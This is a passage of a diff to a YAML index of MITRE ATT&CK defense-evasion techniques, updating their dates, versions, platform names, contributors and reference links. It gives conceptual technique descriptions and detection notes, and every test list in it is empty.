+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5482,7 +5618,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5694,16 +5833,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
